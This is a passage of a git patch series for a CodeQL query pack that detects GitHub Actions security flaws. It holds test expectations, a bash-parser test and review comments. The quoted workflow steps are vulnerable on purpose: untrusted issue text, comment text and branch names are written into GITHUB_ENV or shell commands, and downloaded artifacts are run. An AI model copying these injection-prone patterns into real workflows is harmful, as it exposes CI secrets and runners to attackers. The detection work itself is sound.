"$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | +| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | Potential artifact poisoning in $@, which may be controlled by an external user. 
| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | sed -f config foo.md > bar.md\n | | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | python test.py | | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Uses Step | diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected index 079a89a498c5..e1532c06cdc8 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected 
@@ -13,8 +13,8 @@ edges | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | provenance | | | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | provenance | | | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | | -| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | +| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | | +| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | | | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | provenance | | | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | provenance | | 
@@ -44,9 +44,9 @@ nodes | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | semmle.label | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | +| .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | semmle.label | sed -f config foo.md > bar.md\n | | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | semmle.label | Uses Step | 
diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index f20fdc798291..85b937653249 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -31,7 +31,7 @@ edges | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:15:9:18:6 | Run Step | | .github/workflows/artifactpoisoning51.yml:15:9:18:6 | Run Step | .github/workflows/artifactpoisoning51.yml:18:9:20:57 | Run Step | | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:15:9:18:6 | Run Step | -| .github/workflows/artifactpoisoning52.yml:15:9:18:6 | Run Step | .github/workflows/artifactpoisoning52.yml:18:9:23:40 | Run Step | +| .github/workflows/artifactpoisoning52.yml:15:9:18:6 | Run Step | .github/workflows/artifactpoisoning52.yml:18:9:22:40 | Run Step | | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:15:9:18:6 | Run Step | | .github/workflows/artifactpoisoning53.yml:15:9:18:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:9:23:29 | Run Step | | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:16:9:18:40 | Run Step | From 531f3d40c010be1d03f114f82ac7643350d311ac Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 2 Oct 2024 12:35:09 +0200 Subject: [PATCH 562/707] Add tests for new bash parser --- .../.github/workflows/commands.yml | 21 ++ ql/test/library-tests/commands.expected | 206 ++++++++++++++++++ ql/test/library-tests/commands.ql | 4 + .../library-tests/poisonable_steps.expected | 2 - 4 files changed, 231 insertions(+), 2 deletions(-) create mode 100644 ql/test/library-tests/.github/workflows/commands.yml create mode 100644 ql/test/library-tests/commands.expected create mode 100644 ql/test/library-tests/commands.ql diff --git a/ql/test/library-tests/.github/workflows/commands.yml b/ql/test/library-tests/.github/workflows/commands.yml new file mode 100644 index 000000000000..11ef1a60d312 --- /dev/null +++ b/ql/test/library-tests/.github/workflows/commands.yml @@ -0,0 +1,21 @@ +on: push + +jobs: + local_commands: + runs-on: ubuntu-latest + steps: + - run: | + command1 ; command2 + - run: | + command3 | command4 + - run: | + command5 "$(command6)" + - run: | + command7 && command8 + - run: | + command9 || command10 + - run: | + command11 "`command12`" + - run: | + command13 "`command14` $(date | wc -l)" + diff --git a/ql/test/library-tests/commands.expected b/ql/test/library-tests/commands.expected new file mode 100644 index 000000000000..17b8b982a713 --- /dev/null +++ b/ql/test/library-tests/commands.expected 
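Review bot: The fixture covers `;`, `|`, `&&`, `||` and `$(...)`/backtick substitution, but nothing that must *not* split: a separator inside quotes, a backslash-newline continuation, or a here-doc body. The generated `commands.expected` further down this patch lists here-doc body lines from `multiline2.yml` such as `FOO`, `EOL` and `${ISSUE_BODY}` as commands, which suggests the parser does not skip heredoc content, so adding `- run: |` / `command15 "a ; b"` and a `cat <<EOF` case here would pin the intended behaviour either way. A one-line comment above each step naming what it exercises would also help, since the expected file is currently the only documentation of the parser's contract.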
@@ -0,0 +1,206 @@ +| .github/workflows/commands.yml:7:9:9:6 | Run Step | command1 | +| .github/workflows/commands.yml:7:9:9:6 | Run Step | command2 | +| .github/workflows/commands.yml:9:9:11:6 | Run Step | command3 | +| .github/workflows/commands.yml:9:9:11:6 | Run Step | command4 | +| .github/workflows/commands.yml:11:9:13:6 | Run Step | command5 "SUBCOMMAND" | +| .github/workflows/commands.yml:11:9:13:6 | Run Step | command6 | +| .github/workflows/commands.yml:13:9:15:6 | Run Step | command7 | +| .github/workflows/commands.yml:13:9:15:6 | Run Step | command8 | +| .github/workflows/commands.yml:15:9:17:6 | Run Step | command9 | +| .github/workflows/commands.yml:15:9:17:6 | Run Step | command10 | +| .github/workflows/commands.yml:17:9:19:6 | Run Step | command11 "SUBCOMMAND" | +| .github/workflows/commands.yml:17:9:19:6 | Run Step | command12 | +| .github/workflows/commands.yml:19:9:20:50 | Run Step | command13 "SUBCOMMAND SUBCOMMAND" | +| .github/workflows/commands.yml:19:9:20:50 | Run Step | command14 | +| .github/workflows/commands.yml:19:9:20:50 | Run Step | date | +| .github/workflows/commands.yml:19:9:20:50 | Run Step | wc -l | +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | LINE 1echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | LINE 2 echo '${{github.event.issue.body}}' | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | LINE 2 echo '${{github.event.issue.body}}' | +| 
.github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | LINE 3 echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/multiline2.yml:11:9:15:6 | Run Step | echo "CHANGELOGEOF" | +| .github/workflows/multiline2.yml:11:9:15:6 | Run Step | echo "changelog< event.json | +| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | ${ISSUE_BODY} | +| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | EOL | +| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | FOO | +| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | cat | +| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | tee -a $GITHUB_ENV << EOL | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | ${ISSUE_BODY} | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | EOL | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | FOO | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | cat > issue.txt << EOL | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | ${ISSUE_BODY} | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | EOL | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | FOO | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | cat << EOL | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | tee -a $GITHUB_ENV | +| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | EOF | +| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | Hello | +| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | World | +| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | cat < file.txt | +| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | EOF | +| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | cat <<-EOF | +| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | echo "FOO=$TITLE" | +| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | tee -a 
"$GITHUB_ENV" | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | cat issue.txt | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | echo REPO_NAME=SUBCOMMAND | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | sed 's/\\\\r/\\\\n/g' | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | tee -a $GITHUB_ENV | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | tr -d ' ' | +| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | echo "$TITLE" | +| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | echo "EOF" | +| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | echo "PR_TITLE<> $GITHUB_OUTPUT | +| .github/workflows/multiline.yml:11:9:15:6 | Run Step | echo "changelog<> $GITHUB_OUTPUT | +| .github/workflows/multiline.yml:11:9:15:6 | Run Step | echo -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | EOF=SUBCOMMAND | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | base64 | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | cat status.output.json | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | dd if=/dev/urandom bs=15 count=1 status=none | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | echo "$EOF" >> $GITHUB_OUTPUT | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | echo "SUBCOMMAND" >> $GITHUB_OUTPUT | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | echo "status<<$EOF" >> $GITHUB_OUTPUT | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | echo "$EOF" >> $GITHUB_OUTPUT | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | echo "response<<$EOF" >> $GITHUB_OUTPUT | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | echo $output >> $GITHUB_OUTPUT | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | echo 'JSON_RESPONSE<> "$GITHUB_ENV" | +| .github/workflows/multiline.yml:30:9:34:6 
| Run Step | ${{ toJson(github.event) }} | +| .github/workflows/multiline.yml:30:9:34:6 | Run Step | EOF | +| .github/workflows/multiline.yml:30:9:34:6 | Run Step | cat <<-"EOF" > event.json | +| .github/workflows/multiline.yml:34:9:40:6 | Run Step | ${ISSUE_BODY} | +| .github/workflows/multiline.yml:34:9:40:6 | Run Step | EOL | +| .github/workflows/multiline.yml:34:9:40:6 | Run Step | FOO | +| .github/workflows/multiline.yml:34:9:40:6 | Run Step | cat >> $GITHUB_ENV << EOL | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | ${ISSUE_BODY} | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | EOL | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | FOO | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | cat > issue.txt << EOL | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | ${ISSUE_BODY} | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | EOL | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | FOO | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | cat << EOL >> $GITHUB_ENV | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | EOF | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | Hello | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | World | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | cat < file.txt | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | EOF | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | cat <<-EOF >> "$GITHUB_ENV" | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | echo "FOO=$TITLE" | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | cat issue.txt | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | echo REPO_NAME=SUBCOMMAND >> $GITHUB_ENV | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | sed 's/\\\\r/\\\\n/g' | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | tr -d ' ' | +| 
.github/workflows/multiline.yml:66:9:71:6 | Run Step | echo "$TITLE" >> $GITHUB_ENV | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | echo "EOF" >> $GITHUB_ENV | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | echo "PR_TITLE<> $GITHUB_ENV | +| .github/workflows/multiline.yml:71:9:78:6 | Run Step | echo "$TITLE" | +| .github/workflows/multiline.yml:71:9:78:6 | Run Step | echo 'JSON_RESPONSE<> "$GITHUB_ENV" | +| .github/workflows/multiline.yml:78:9:85:6 | Run Step | echo '$ISSUE' | +| .github/workflows/multiline.yml:78:9:85:6 | Run Step | echo 'EOF' | +| .github/workflows/multiline.yml:78:9:85:6 | Run Step | echo 'JSON_RESPONSE<> "$GITHUB_ENV" | +| .github/workflows/multiline.yml:85:9:89:29 | Run Step | echo 'JSON_RESPONSE<> "$GITHUB_ENV" | +| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | venv/bin/activate | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | echo foo | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | echo foo | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | . 
venv/bin/activate | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | echo foo | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | ./venv/bin/activate | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | sh venv/bin/activate.sh | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | echo SUBCOMMAND | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | sh venv/bin/activate.sh | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | echo bar | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | echo foo | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | sh venv/bin/activate.sh | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | echo foo | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | sh venv/bin/activate.sh > output | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | echo foo | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | pnpm run test:ct | +| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | pip install nbformat | +| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | python scripts/generate_notebooks.py | +| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | python scripts/generate_theme.py --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | xvfb-run ./mvnw clean package | +| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | echo "bar" | +| 
.github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | echo "foo" | +| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | npm i | +| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | echo "bar" | +| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | echo "foo" | +| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | npm i | +| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | echo "bar" | +| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | echo "foo" | +| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | npm i | +| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | echo "foo SUBCOMMAND bar" | +| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | npm i | +| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | dotnet test foo/Tests.csproj -c Release | +| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | go run foo.go | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | " config.json | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | git_branch = .* | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | sed -i "s | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\" | +| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | sed -f ./config.sed file.txt > foo.txt | +| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | sed -f config file.txt > foo.txt | +| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | awk -f ./config.awk > foo.txt | +| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | echo "foo" | +| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | +| 
.github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | ./foo/cmd | +| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | sed -e 's##TITLE#' -e 's##${{ env.sot_repo }}#' -e 's##${TITLE}#' .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | echo ${{ steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | echo ${{needs.job1.outputs.job_output}} | diff --git a/ql/test/library-tests/commands.ql b/ql/test/library-tests/commands.ql new file mode 100644 index 000000000000..a13608145cfd --- /dev/null +++ b/ql/test/library-tests/commands.ql @@ -0,0 +1,4 @@ +import actions + +from Run run +select run, run.getACommand() diff --git a/ql/test/library-tests/poisonable_steps.expected b/ql/test/library-tests/poisonable_steps.expected index 0cd71f96ea91..100eddb14002 100644 --- a/ql/test/library-tests/poisonable_steps.expected +++ b/ql/test/library-tests/poisonable_steps.expected @@ -1,6 +1,4 @@ -| .github/workflows/multiline2.yml:24:9:30:6 | Run Step | | .github/workflows/multiline2.yml:63:9:66:6 | Run Step | -| .github/workflows/multiline.yml:24:9:30:6 | Run Step | | .github/workflows/multiline.yml:63:9:66:6 | Run Step | | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | | .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | From 68da4823529d4084cb953d7a3950f4d05555af14 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 2 Oct 2024 12:36:49 +0200 Subject: [PATCH 563/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index af477fb9bf71..9637b9931187 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml 
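Review bot: The rows for `poisonable_steps.yml:36:9:37:6` record a mis-parse as the expected result: the single command `sed -i "s|git_branch = .*|git_branch = \"$GITHUB_HEAD_REF\"|" config.json` is split on the `|` characters inside its double-quoted sed expression into fragments such as `sed -i "s`, `git_branch = .*` and `" config.json`. Checking that in as the oracle locks in the splitter's lack of quote awareness instead of flagging it. Because `getACommand()` is the basis for recognising poisonable steps and writes to `$GITHUB_ENV`/`$GITHUB_OUTPUT`, a quoted `|` or `;` can both hide the real command and surface phantom ones. Unless the parser rewrite in the following commit already corrects these rows, I would make the splitter skip separators inside single and double quotes and regenerate this file rather than accept the fragments.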
@@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.61 +version: 0.1.62 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 7b8b9ef321c2..6548292a6772 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.61 +version: 0.1.62 groups: [actions, queries] suites: codeql-suites extractor: javascript From 7d2cbc1f50bd1121a0a0ec88ec955d8b35a9f708 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 3 Oct 2024 14:13:27 +0200 Subject: [PATCH 564/707] Improve Bash script parser --- ql/lib/codeql/actions/Ast.qll | 18 + ql/lib/codeql/actions/Helper.qll | 500 ++++++++---------- ql/lib/codeql/actions/ast/internal/Ast.qll | 194 ++++++- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 58 +- .../security/EnvPathInjectionQuery.qll | 8 +- .../actions/security/EnvVarInjectionQuery.qll | 11 +- .../security/OutputClobberingQuery.qll | 34 +- .../actions/security/PoisonableSteps.qll | 9 +- ql/test/library-tests/commands.expected | 32 +- .../library-tests/poisonable_steps.expected | 2 - ql/test/library-tests/test.ql | 12 +- 11 files changed, 488 insertions(+), 390 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index a4c50ecf55b6..759bcf3f786a 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll 
@@ -294,9 +294,27 @@ class Run extends Step instanceof RunImpl { string getWorkingDirectory() { result = super.getWorkingDirectory() } + string getStmt(int i) { result = super.getStmt(i) } + + string getAStmt() { result = super.getAStmt() } + + string getCommand(int i) { result = super.getCommand(i) } + string getACommand() { result = super.getACommand() } + predicate getAssignment(int i, string name, string value) { super.getAssignment(i, name, value) } + predicate getAnAssignment(string name, string value) { super.getAnAssignment(name, value) } + + predicate getAWriteToGitHubEnv(string name, string value) { + super.getAWriteToGitHubEnv(name, value) + } + + predicate getAWriteToGitHubOutput(string name, string value) { + super.getAWriteToGitHubOutput(name, value) + } + + predicate getAWriteToGitHubPath(string value) { super.getAWriteToGitHubPath(value) } } abstract class SimpleReferenceExpression extends AstNode instanceof SimpleReferenceExpressionImpl { diff --git a/ql/lib/codeql/actions/Helper.qll b/ql/lib/codeql/actions/Helper.qll index d6e3042ead36..8391463fd202 100644 --- a/ql/lib/codeql/actions/Helper.qll +++ b/ql/lib/codeql/actions/Helper.qll 
